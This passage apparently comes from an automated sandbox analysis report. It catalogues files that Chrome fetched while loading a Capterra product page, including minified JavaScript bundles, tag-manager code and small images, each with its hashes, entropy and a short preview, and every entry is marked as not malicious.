                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o.......(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12465), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12465
                                                                                                                                                                                                        Entropy (8bit):5.143073751658841
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:VPUJSC+IBjai4s9maJb7GKuJt6HHfPcR3WriRcVEvoh2uj5li/spF7uxQ4wsJvUk:Vc49Il/URxTduq0F765UNMrd
                                                                                                                                                                                                        MD5:70D60F116BE0547CD0A4192C213F2CCB
                                                                                                                                                                                                        SHA1:1A517CBEC805E9148CC40A91CD440FCFEBDFC608
                                                                                                                                                                                                        SHA-256:E186DBBF953431129D19D46D52AD1BFBE6232CED1752EFC48EA1F3EC0AB00422
                                                                                                                                                                                                        SHA-512:695DBB34ED677B95677442381DE3585D6D5A728D06E4974316A7977CDAC696F62A03576AA99B4D3EFC3F2E3D3713DABE85B0693A1C3CE924404732520BF9E98B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(()=>{var e=(e,t)=>()=>(e&&(t=e(e=0)),t),t=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);function n(e){let t=location.href;if(e){let n=new URL(t);if(n.pathname!==e)return n.pathname=e,n.search="",n.href}return t}var r,i,a,o,u,c,s,l,f,d,v,m,p,h,g,y,T,S,E,b,L,w,C,M,x,k,A,F,I,B,D,P,R,N,q,O,H,V,U,_,j,J,$,z,G,K,Q,W,X,Y,Z,ee,et,en,er,ei,ea,eo,eu,ec,es,el=e(()=>{}),ef=e(()=>{c=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},s=function(e){if("loading"===document.readyState)return"loading";var t=c();if(t){if(e<t.domInteractive)return"loading";if(0===t.domContentLoadedEventStart||e<t.domContentLoadedEventStart)return"dom-interactive";if(0===t.domComplete||e<t.domComplete)return"dom-content-loaded"}return"complete"},l=function(e){var t=e.nodeName;return 1===e.nodeType?t.toLowerCase():t.toUpperCase().replace(/^#/,"")},f=function(e,t){var n="";try{for(;e&&9!==e.nodeType;){var r=e,i=r.id?"#"+r.id:l(r)+(r.classL
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (57306)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):554749
                                                                                                                                                                                                        Entropy (8bit):5.458137510361775
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:QKas9+j2vYAcyspIOL2LeNoNYIHZKC6ntkc8TUDuwiTOizp5S92gixwWPXUmwg6w:Quc0Te2FJWOtcJjAJcHA
                                                                                                                                                                                                        MD5:2A80B263F83FC001C9F50162007F11BB
                                                                                                                                                                                                        SHA1:0B3E131F6AA03015A8F20EDF3D5A5CE09B168C9F
                                                                                                                                                                                                        SHA-256:EDADF8436C633EB717030BDE5D34043B725A22E49603B31458D34011515E399B
                                                                                                                                                                                                        SHA-512:A34A2417BB3D6E7C03EB89138CCF5EE257DDA47C290FD47E553D518CFC4673955E2EF4BBBE6635440C0F68C1A49F18018B1DF5B6DA1FBE14670D449AFBAF7242
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:var z1=Object.defineProperty,B1=Object.defineProperties;var H1=Object.getOwnPropertyDescriptors;var qs=Object.getOwnPropertySymbols;var Nh=Object.prototype.hasOwnProperty,kh=Object.prototype.propertyIsEnumerable;var qc=Math.pow,Oh=(e,t,n)=>t in e?z1(e,t,{enumerable:!0,configurable:!0,writable:!0,value:n}):e[t]=n,I=(e,t)=>{for(var n in t||(t={}))Nh.call(t,n)&&Oh(e,n,t[n]);if(qs)for(var n of qs(t))kh.call(t,n)&&Oh(e,n,t[n]);return e},H=(e,t)=>B1(e,H1(t));var fi=(e,t)=>{var n={};for(var r in e)Nh.call(e,r)&&t.indexOf(r)<0&&(n[r]=e[r]);if(e!=null&&qs)for(var r of qs(e))t.indexOf(r)<0&&kh.call(e,r)&&(n[r]=e[r]);return n};var m=(e,t,n)=>new Promise((r,o)=>{var i=l=>{try{a(n.next(l))}catch(c){o(c)}},s=l=>{try{a(n.throw(l))}catch(c){o(c)}},a=l=>l.done?r(l.value):Promise.resolve(l.value).then(i,s);a((n=n.apply(e,t)).next())});var Ys=typeof globalThis!="undefined"?globalThis:typeof window!="undefined"?window:typeof global!="undefined"?global:typeof self!="undefined"?self:{};function xf(e){return
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5066
                                                                                                                                                                                                        Entropy (8bit):7.949534728937366
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:ocjHdvUVHisZgrCj1nttMajv+WekU0ReBsCsqonAXG6r37GZzp3otj3WF:oUdcHGrK1nt+G+WHxeBjon26Z13Gj3s
                                                                                                                                                                                                        MD5:CFA9B5CBE56ED728960B96489CA68C60
                                                                                                                                                                                                        SHA1:7CAC15C9CF48480C54AA856AB9DA0D4986D08536
                                                                                                                                                                                                        SHA-256:2B109A28C2274B465866CE7B31E154B7559E21486EBF654CF6AA791317BD1650
                                                                                                                                                                                                        SHA-512:21ED499057118DE3B54154180A65CFA637F80B494DD53A631269E9172930E15FE9A0428586EA8C8634353F16B59890DAF0101CDD7CEBD4929DFB20725F6082D3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB.........IDATx^.yt.U......ey..MvbB...$d!,...hB....0,3,....9t.t...9..$.i..4.. .f....@B.NL.'..M.e[..*U.7GRH,Y.e.......*.%.O.n.w..!B.L#>.h'L#.28....@`..>...BrD.y-4.......e...@....:....`..<O...../..Vf+..t.3...q&5..(@.>J|.....\.5..JGK..R..6`7.......@+.....#...`.....zH..m.-..R...5.Th..49:O....U.v6....#OA2..(@.h...N.sa.m.G.V.M*.@Bs.7;:..T..;.............1...0.....fe.R......N.....3....7..)U...L.|@.x.5k.S..F)..c..u.....;..@..JA...w.0.z.....k2.H-..u~.Y.r...6..NB...../..Q.>V..).....;..U..........q.^e.P#..{.4..aN..]mk....s.r..2"...0.!.g....I2.>..(s.<...}..S...i].......!{...N*D..EB...{..{.w......K...J..v..:...<.......n+f..6..P#j7.cq.&*....>..U.]W......S\e8m=.N.U..mq.>].m......C....Z{.W.......MK.......tE......q."J=.....1.}...S/7co...V9.b..D_.S...l:.O..%c.:.m.w..l.l....I*t....S...i.*.'t.3..7.d{...xB..{..-.."J5m1D....o...-...*.(...[.w.M.,.{....[...Q2..........p`z.fX..+.HfB2-...f....~....<-R....{...Z,OZ.N7kLi..$E..V..@X.7.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):125933
                                                                                                                                                                                                        Entropy (8bit):5.384136501701716
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:3+KQ2QdFf1HReupIuXogq3W9qpNsUqlMw8905pef2ODXNaN:S11H7479NsUqlm9050fVTNaN
                                                                                                                                                                                                        MD5:72D927FD1A9CEAF31FAF0D6095C395F0
                                                                                                                                                                                                        SHA1:5D29A3ABE568F4C052793D11263DAD2AEC30C159
                                                                                                                                                                                                        SHA-256:9C6E3BCAE923D1BDF4E1139A2A51B1EF9856416C4D2002F708D5CADF0743D9F3
                                                                                                                                                                                                        SHA-512:4F81325E4F4FBE67C4925C487EB6B3CB6F7E4D36AE678222D35B7F52D850AEEBBEA02DB63A6839BAB808AAE2B64C441870BC30912A7ED45F7DAB9618ECBA4C4E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/chunks/main-7ff3395b5b239e11.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{98749:function(e,t){"use strict";function r(){return""}Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"getDeploymentIdQueryOrEmptyString",{enumerable:!0,get:function(){return r}})},11541:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (20314), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):20314
                                                                                                                                                                                                        Entropy (8bit):5.38896819223286
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:bOKLVJpmfv85lMO8ZVS3X8gkaVkF5BUMtWHTukwR/RdUWJdt:CKhGv87MO8nm8gkakFAoWHTukwRhJb
                                                                                                                                                                                                        MD5:8AF9AA3BFA8ED7BBAA4189CCA768B6EF
                                                                                                                                                                                                        SHA1:533564913B9F573E6CE546D8B00FEA30516B8752
                                                                                                                                                                                                        SHA-256:A461AC8D233A549A00475DC12E27744EC778D62F48E021586E549713652CB30C
                                                                                                                                                                                                        SHA-512:668D0940A68C653E663AE6166BD71E0BF07E063AFB138E82EBE8A3FF79AD58A15D1C60FDB175B62FDF7B6397213B64FB38BFFBE13541306F043262D6E6391792
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/9942-63f9c34da6848f69.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9942],{16742:function(e){var t;t=function(){"use strict";let{entries:e,setPrototypeOf:t,isFrozen:n,getPrototypeOf:o,getOwnPropertyDescriptor:r}=Object,{freeze:i,seal:a,create:l}=Object,{apply:c,construct:s}="undefined"!=typeof Reflect&&Reflect;c||(c=function(e,t,n){return e.apply(t,n)}),i||(i=function(e){return e}),a||(a=function(e){return e}),s||(s=function(e,t){return new e(...t)});let u=A(Array.prototype.forEach),m=A(Array.prototype.pop),f=A(Array.prototype.push),p=A(String.prototype.toLowerCase),d=A(String.prototype.toString),h=A(String.prototype.match),g=A(String.prototype.replace),y=A(String.prototype.indexOf),T=A(String.prototype.trim),E=A(RegExp.prototype.test),b=(j=TypeError,function(){for(var e=arguments.length,t=Array(e),n=0;n<e;n++)t[n]=arguments[n];return s(j,t)});function A(e){return function(t){for(var n=arguments.length,o=Array(n>1?n-1:0),r=1;r<n;r++)o[r-1]=arguments[r];return c(e,t,o)}}function _(e,o,r){var i;r=n
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (25600), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                        Entropy (8bit):5.448672016604878
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:RYzFZflJreLbrCS9h7vo/TMNt340KrExPdtS9p:eeLP7vobcSr
                                                                                                                                                                                                        MD5:48BE1563378F7C36BDADC0F2EB616856
                                                                                                                                                                                                        SHA1:2AA42B08FE8CC7AC0DC371D2309A38D5A465247F
                                                                                                                                                                                                        SHA-256:63C035E2F43180086B19EC08F35C8DEEE82B2B804DDFCF92F7F0E6D835957BFE
                                                                                                                                                                                                        SHA-512:6BD0492F48D247C598BB23CD41063A90C95B93AC491F80BB80FD755D004A2275CD04D0D456CDF618D70E344C74B6EA51FBD1EE3AFC62F68A91DA322A0BF9692F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/43.7ac85d58.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[43],{"1Fob":function(t,e,r){"use strict";var n=new RegExp("%[a-f0-9]{2}","gi"),f=new RegExp("(%[a-f0-9]{2})+","gi");function decodeComponents(t,e){try{return decodeURIComponent(t.join(""))}catch(f){}if(1===t.length)return t;e=e||1;var r=t.slice(0,e),n=t.slice(e);return Array.prototype.concat.call([],decodeComponents(r),decodeComponents(n))}function decode(t){try{return decodeURIComponent(t)}catch(f){for(var e=t.match(n),r=1;r<e.length;r++)e=(t=decodeComponents(e,r).join("")).match(n);return t}}t.exports=function(t){if("string"!==typeof t)throw new TypeError("Expected `encodedURI` to be of type `string`, got `"+typeof t+"`");try{return t=t.replace(/\+/g," "),decodeURIComponent(t)}catch(e){return function customDecodeURIComponent(t){for(var r={"%FE%FF":"\ufffd\ufffd","%FF%FE":"\ufffd\ufffd"},n=f.exec(t);n;){try{r[n[0]]=decodeURIComponent(n[0])}catch(e){var i=decode(n[0]);i!==n[0]&&(r[n[0]]=i)}n=f.exec(t)}r["%C2"]="\ufffd";for(var o=Obj
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):42
                                                                                                                                                                                                        Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                        MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                        SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                        SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                        SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4616
                                                                                                                                                                                                        Entropy (8bit):7.242055294633911
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jZJ5N26MT0D5MdtbZPAVwzVHlMHVWOifzmf:+0FJoYNMtKw/MHCfzY
                                                                                                                                                                                                        MD5:A2A366EACF51DD8919CD75A3556EAF1A
                                                                                                                                                                                                        SHA1:5980E1A52BE3E4C5EFF8D0DD18584637A19DF0F1
                                                                                                                                                                                                        SHA-256:7E6775C071A1E04B6C81B564E3D61ADFA223BAB087AF2E67DB2EA531A1F727BB
                                                                                                                                                                                                        SHA-512:B9D6BC82BCCFE731F84838CCB8521F7D32813C50ECC353C36B5A28622F64DBCAC22B533BFF5E08F32ABA84939ECF1B65051228E97895D7F132C20CE250532D5E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/6571081c-36c2-42ed-9ae6-ffbf5ed12e58.jpeg?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o.......(iinf..........infe........av01Color.....iprp....ipco....ispe.......x........pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6239
                                                                                                                                                                                                        Entropy (8bit):7.452066390875264
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7j05N26MT0D5MdtbZPAVwzVJElgDVMEBJ6wDMYDqDh1KBu:+74oYNMtKwX/VtJgYDa1D
                                                                                                                                                                                                        MD5:1EB75664EFD7E7E0518B37CCD2FDAD47
                                                                                                                                                                                                        SHA1:45ECEBF462C5759AC07FE54054FD5A26B714C4C1
                                                                                                                                                                                                        SHA-256:8FCE57450DF160033747A236FBF614AF08ACFAEF130850A7955A65554F4BBE79
                                                                                                                                                                                                        SHA-512:D5E18B71DCBDDA35D4BF5A2EE2D8C45B282BAB2A4E938755C8D32BE8C5978153064AE82888E027A8F918386658D95C18527549DFBC89589E8BFD14847C4DE6DE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/44e20468-ea22-4d70-9132-b88c151348b5.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65465)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1013087
                                                                                                                                                                                                        Entropy (8bit):5.500385161867447
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:aD6WJm3vDrF48PBs4EPTVrBbEvrzeoZDkcb2OYyfSW:HWJmfDrnZs4EPTVrBbEvneoZDkcj
                                                                                                                                                                                                        MD5:7D6EEF1F316B418F54347C96841FF062
                                                                                                                                                                                                        SHA1:62E1B752FBAB6F5B5A98802C36F3FDCB2287193D
                                                                                                                                                                                                        SHA-256:6075D745D9EE93A4C355F8668A27A943B96FF65383267324318682F4F96CBAA9
                                                                                                                                                                                                        SHA-512:AEB44BF58466931E8B3BAB3BD1B9C8876183E1621C7D7720906F5390EC745FD56D881F9408BD92D427B9D3A796BAEF7F6B0E567894E934C5A73F70E262BC3BE7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:/*! For license information please see main.b9f2536d.js.LICENSE.txt */.(()=>{var e={8550:(e,t,n)=>{"use strict";t.W=s;var r,i=(r=n(9950))&&r.__esModule?r:{default:r};function o(){return o=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},o.apply(this,arguments)}function a(e,t){if(null==e)return{};var n,r,i=function(e,t){if(null==e)return{};var n,r,i={},o=Object.keys(e);for(r=0;r<o.length;r++)n=o[r],t.indexOf(n)>=0||(i[n]=e[n]);return i}(e,t);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);for(r=0;r<o.length;r++)n=o[r],t.indexOf(n)>=0||Object.prototype.propertyIsEnumerable.call(e,n)&&(i[n]=e[n])}return i}function s(e){var t=e.scale,n=void 0===t?"M":t,r=a(e,["scale"]);return i.default.createElement("svg",o({},r,r),"L"===n&&i.default.createElement("path",{d:"M10.563 2.206l-9.249 16.55a.5.5 0 0 0 .436.744h18.5a.5.5 0 0 0 .436-.744l-9.251-16.55a.5.5 0 0 0-.8
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                        Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                        MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                        SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                        SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                        SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/rul/1072635088?random=1725034607177&cv=11&fst=1725034607177&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&hn=www.googleadservices.com&frm=0&tiba=Publicate%20Pricing%2C%20Alternatives%20%26%20More%202024%20%7C%20Capterra&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse
                                                                                                                                                                                                        Preview:<html></html>
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10998), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10998
                                                                                                                                                                                                        Entropy (8bit):5.401854333655161
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:/FoldHrFouQhx82CYE8mAwVbH9HX93t5dhj1Vcf4YtWwubOKihHV:QdHKhx82CYETAwvHXJt5f1WfOwgC1
                                                                                                                                                                                                        MD5:90F2E1FBF02A398724707AF02DDB4AA4
                                                                                                                                                                                                        SHA1:21563855102F763E61E1AF34A0E979486F14E18E
                                                                                                                                                                                                        SHA-256:63A7E475C2662E75B59B27DECD46F85D06DE76BCA6250276822837DB0E5EE500
                                                                                                                                                                                                        SHA-512:0B0A25BAE0CE92F47B1D3A63A34ADEC4A71EFC1B6CC2C439C442B790D3652E3BD81040FF0C65816E5413DE016DB01C649F34C7BC0D410F44BF844960D8B74A17
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6219],{72845:function(t,e,n){var a=n(27573),r=n(14823),o=n(907);e.default=t=>{let{gtmContainerId:e}=t;return(0,o.p)(o.Q.DISABLE_GOOGLE_TAG_MANAGER)?null:(0,a.jsx)(r.cp,{gtm:{id:e}})}},53123:function(t,e,n){n.r(e),n.d(e,{GTMInitialDataLayer:function(){return d},default:function(){return s}});var a=n(27573),r=n(7653),o=n(26863),i=n(907),c=n(20455);n(71364);var l=(0,n(30359).$)("ed1db1d564ee43517e328ffe5c002579ebe29f7c");let d=t=>{let{data:e={}}=t;(0,r.useEffect)(()=>{l({data:e})},[]);let n=(0,r.useRef)(!1);return n.current||c.Z.google.send(e),(0,r.useEffect)(()=>{n.current=!0},[]),null};var s=t=>{let{gtmContainerId:e}=t;return(0,i.p)(i.Q.DISABLE_GOOGLE_TAG_MANAGER)?null:(0,a.jsx)(o.default,{strategy:"afterInteractive",id:"google-tag-manager",type:"text/javascript",dangerouslySetInnerHTML:{__html:"\n (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':\n new Date().getTime(),event:'gtm.js'});var
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3034)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):279977
                                                                                                                                                                                                        Entropy (8bit):5.561013368468341
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:v3SAdB6si3wcWl6j4zCl0ztNAJ0kDzOJfjU7iMN+:viAv6sgwcACYkno
                                                                                                                                                                                                        MD5:C280B854B8B13E22275033B6E4DEABCE
                                                                                                                                                                                                        SHA1:FBA7C5B3E82AD69592BD9421DC5849E99AEFC0F3
                                                                                                                                                                                                        SHA-256:BA4A37FB7655C819DDD1461E80851F3D8DCF3BC6FB4B1A8967931A24CDFFFE64
                                                                                                                                                                                                        SHA-512:739A6748699354BF7D44ED53C7D6E4B70416189E6BD81DB036B73A048181E27B58A963A25CB2861395E7C23F08A7691604DA4FB40FC35818BBDDE2C5044E1829
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":1,"function":"__c","vtp_value":1}],. "tags":[{"function":"__gct","vtp_trackingId":"G-JL3QGDSQZ4","vtp_sessionDuration":0,"tag_id":1},{"function":"__ccd_em_outbound_click","priority":0,"vtp_includeParams":true,"vtp_instanceDestinationId":"G-JL3QGDSQZ4","tag_id":3},{"function":"__ccd_em_download","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JL3QGDSQZ4","tag_id":5},{"function":"__ccd_em_video","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JL3QGDSQZ4","tag_id":6},{"function":"__ccd_em_site_search","vtp_searchQueryParams":"q,s,search,query,keyword","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JL3QGDSQZ4","tag_id":7},{"function":"__ccd_em_scroll","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JL3QGDSQZ4","tag_id":8},{"function"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 500 x 610, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):111731
                                                                                                                                                                                                        Entropy (8bit):7.995359056760109
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:3072:2i5oBznGU0x6SRnPOu08uZlsBnENWVhMut8B:Ynax6muEnmu+
                                                                                                                                                                                                        MD5:D183A96E91FA5F8E9E0962F7FCC16BB5
                                                                                                                                                                                                        SHA1:2460E396A53F43507B557B3295489EDAAC72F28E
                                                                                                                                                                                                        SHA-256:5D8E8CDDBF8CA7DD4F5795E300C55B99048C797A5D88663708827CADA309725C
                                                                                                                                                                                                        SHA-512:2E8FEFC865C72C633843A61A861A2CF8810FB6E259969F6762855EAA88C8DDC50EB8E4EC7E856DCF6FDA9D1A7A247FDE0A5F46DBCF604755A94AD9BE5AEA2083
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
